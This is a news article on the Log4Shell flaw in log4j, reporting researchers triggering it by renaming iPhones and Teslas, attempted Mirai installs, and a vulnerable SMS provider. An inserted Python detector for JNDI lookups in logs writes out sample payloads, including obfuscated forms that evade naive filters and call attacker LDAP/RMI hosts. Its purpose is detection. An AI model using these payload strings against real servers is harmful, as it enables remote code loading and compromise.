Researchers trigger new exploit by renaming iPhone and Tesla

Security researchers investigating the recently discovered and “extremely bad” Log4Shell vulnerability claim to have triggered it through devices as diverse as iPhones and Tesla cars. In screenshots shared online, changing the device name of an iPhone or Tesla to a special exploit string was enough to make Apple’s or Tesla’s servers reach out to the researchers, indicating that the server on the other end was vulnerable to Log4Shell.

During the demonstrations, the researchers changed the names of the devices to a string that would send the servers to a test URL, exploiting the behavior enabled by the vulnerability. After the name change, inbound traffic showed URL requests from IP addresses owned by Apple and, in Tesla’s case, China Unicom, the mobile services partner for the Chinese market. In short, the researchers tricked Apple’s and Tesla’s servers into visiting a URL of their choice.

An information screen for the iPhone whose name has been changed to contain the exploit string.
Image: Cas van Cooten / Twitter

The iPhone demonstration came from a Dutch security researcher; the other was uploaded to the anonymous Log4jAttackSurface GitHub repository.

Assuming the images are genuine, they show behavior (remote resource loading) that shouldn’t be possible with text contained in a device name. This proof of concept has led to numerous reports that Apple and Tesla are vulnerable to the exploit.

Although the demonstration is alarming, it is unclear how useful it would be for cybercriminals. In theory, an attacker could host malicious code at the target URL in order to infect vulnerable servers, but a well-maintained network could block such an attack at the network level, for instance by restricting the outbound connections its servers are allowed to make. More generally, there is nothing to indicate that the method could lead to a broader compromise of Apple’s or Tesla’s systems. (Neither company responded to an email request for comment at the time of posting.)

Still, it’s a reminder of the complex nature of technological systems, which almost always depend on code pulled from third-party libraries. Log4Shell affects an open source Java tool called log4j that is widely used for application event logging. It is still not known exactly how many devices are affected, but researchers estimate the number is in the millions, including obscure systems that are rarely the target of attacks of this nature.

The full extent of exploitation in the wild is unknown, but in a blog post, the digital forensics platform Cado reported that it had detected attempts to use this method to install Mirai botnet code on vulnerable servers.

Log4Shell is all the more serious because it is relatively easy to exploit. The vulnerability works by tricking the application into interpreting a piece of text as a reference to a remote resource and attempting to retrieve that resource instead of saving the text as written. All that is required is for a vulnerable system to write the special character string into its application logs.

This creates the potential for vulnerability in any system that accepts user input, since the submitted text may end up stored in logs. The log4j vulnerability was first spotted in Minecraft servers, which attackers could compromise using chat messages; systems that send and receive other message formats, such as SMS, are clearly also susceptible.
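To make the mechanism in the two paragraphs above concrete, here is an added example of the detection logic a defender would run over application or access logs to find the kind of string the researchers put into their device names. It is not code from log4j, Apple, Tesla or the researchers; the payload shape `${jndi:<scheme>://<host>/...}` and the case and default-value lookups attackers nest inside it to dodge naive filters are public knowledge about the bug rather than anything this article documents, and the log lines, hostnames and IP addresses are constructed for the example.

```python
"""Detect Log4Shell-style lookup strings in log lines.

Added example for this article; not code from log4j or any vendor named above.
The payload shape ${jndi:<scheme>://<host>/...} and the obfuscation tricks handled
here (${lower:..}, ${upper:..}, ${key:-default}) are public knowledge about the bug.
"""
import re

# Innermost ${...} lookup: a body with no further "${" or "}" inside it.
_INNER = re.compile(r"\$\{([^${}]*)\}")

# A JNDI lookup after de-obfuscation: capture the scheme and host[:port].
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z][a-z0-9+.-]*)://([^/}\s]+)", re.IGNORECASE)


def _resolve_inner(body: str) -> str:
    """Evaluate one nested lookup the way an attacker relies on the logger doing it.

    ${lower:X} / ${upper:X} change case, and ${key:-default} yields the default when
    the key (env, sys, ::, ...) is undefined; that is how payloads smuggle the letters
    of "jndi" past a filter that only looks for the literal substring "${jndi:".
    """
    if ":-" in body:
        _key, default = body.split(":-", 1)
        return default
    prefix, sep, arg = body.partition(":")
    if sep and prefix.lower() == "lower":
        return arg.lower()
    if sep and prefix.lower() == "upper":
        return arg.upper()
    # Anything else (including the jndi lookup itself) is left in place.
    return "${" + body + "}"


def normalize(text: str) -> str:
    """Collapse nested obfuscation lookups, innermost first, until nothing changes."""
    while True:
        new = _INNER.sub(lambda m: _resolve_inner(m.group(1)), text)
        if new == text:
            return text
        text = new


def find_jndi_lookups(line: str) -> list:
    """Return (scheme, host) for every JNDI lookup found in one log line."""
    return [(m.group(1).lower(), m.group(2)) for m in _JNDI.finditer(normalize(line))]


def scan_log(lines) -> list:
    """Return (line_number, scheme, host) for each suspicious line, 1-indexed."""
    hits = []
    for n, line in enumerate(lines, 1):
        for scheme, host in find_jndi_lookups(line):
            hits.append((n, scheme, host))
    return hits


# Constructed sample log lines (not real traffic); hosts use documentation ranges.
SAMPLE_LOG_LINES = [
    '198.51.100.4 - - [10/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    # Plain payload in a User-Agent header, the same idea as the device-name trick above.
    '198.51.100.9 - - [10/Dec/2021:10:01:05 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://203.0.113.7:1389/a}"',
    # Obfuscated with case lookups: ${${lower:J}ndi:...}
    'device_name="${${lower:J}ndi:${lower:L}DAP://203.0.113.8:1389/Exploit}"',
    # Obfuscated with empty-key defaults: ${::-j} evaluates to "j"
    'msg=${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example.net:1099/x}',
    # Benign lookup syntax that a filter on "${" alone would wrongly flag.
    'msg=${env:HOME} started, build ${sys:java.version}',
]


if __name__ == "__main__":
    for n, scheme, host in scan_log(SAMPLE_LOG_LINES):
        print(f"line {n}: JNDI lookup via {scheme} to {host}")
```

Run as a script it reports lines 2, 3 and 4 of the sample and stays quiet on the benign `${env:...}` lookup. This is a triage heuristic, not a fix: the logger supports more lookup types than the three handled here, so the patched library release described later in this article is what actually closes the hole, and the hits from a scan like this are mainly useful for deciding which servers to check for outbound LDAP or RMI connections.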

At least one of the major SMS providers appears to be vulnerable to the exploit, according to tests conducted by The Verge. When sent to numbers operated by the SMS provider, text messages containing an exploit string triggered a response from the company’s servers that revealed information about their IP address and hostname, suggesting that the servers could be tricked into executing malicious code. Calls and emails to the affected company had not been answered at the time of posting.

An update to the log4j library has been released to mitigate the vulnerability, but updating all vulnerable machines will take time given the challenges of updating enterprise software at scale.
